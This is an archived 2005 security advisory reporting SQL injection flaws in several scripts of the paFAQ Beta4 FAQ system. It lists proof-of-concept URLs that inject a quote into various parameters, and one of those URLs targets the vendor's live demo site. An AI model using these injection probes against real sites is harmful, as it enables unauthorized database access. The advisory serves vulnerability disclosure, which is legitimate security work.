paFAQBeta4.txt

2005-02-25T00:00:00
ID PACKETSTORM:36207
Type packetstorm
Reporter Pi3cH
Modified 2005-02-25T00:00:00

Description

                                        
                                            `  
  
[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection  
Date: 2005 February  
Bug Number: 07  
  
paFAQ  
is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL for speedy processing times.  
More info @:  
http://www.phparena.net/pafaq.php  
  
  
Discussion:  
--------------------  
Sql Injection in 'question.php', 'answer.php', 'search.php', 'comment.php' that may allow a remote user to launch Sql injection attacks.  
A form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure code on a system connected to the Internet, bypassing the firewall.  
  
This vulnerability is reported to exist in paFAQ Beta4, other versions might  
also be affected.   
  
Exploit:  
--------------------  
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='  
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='  
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10  
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10  
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='  
http://www.example.com/index.php?act=Search&code=01&search_item='  
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='  
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4  
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4  
  
  
Example:  
--------------------  
@ authors website!  
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='  
-  
  
Solution:  
--------------------  
in the code validate values with PHP patterns then process it.  
  
  
Credit:  
--------------------  
Discovered by PersianHacker.NET Security Team  
by Pi3cH (pi3ch persianhacker net)  
http://www.PersianHacker.NET  
  
Special Thanks: our security team users.  
  
  
Help  
--------------------  
visit: http://www.PersianHacker.NET  
or mail me @: pi3ch persianhacker net  
  
  
Note  
--------------------  
Scripts authors were not be contacted for this bug.  
`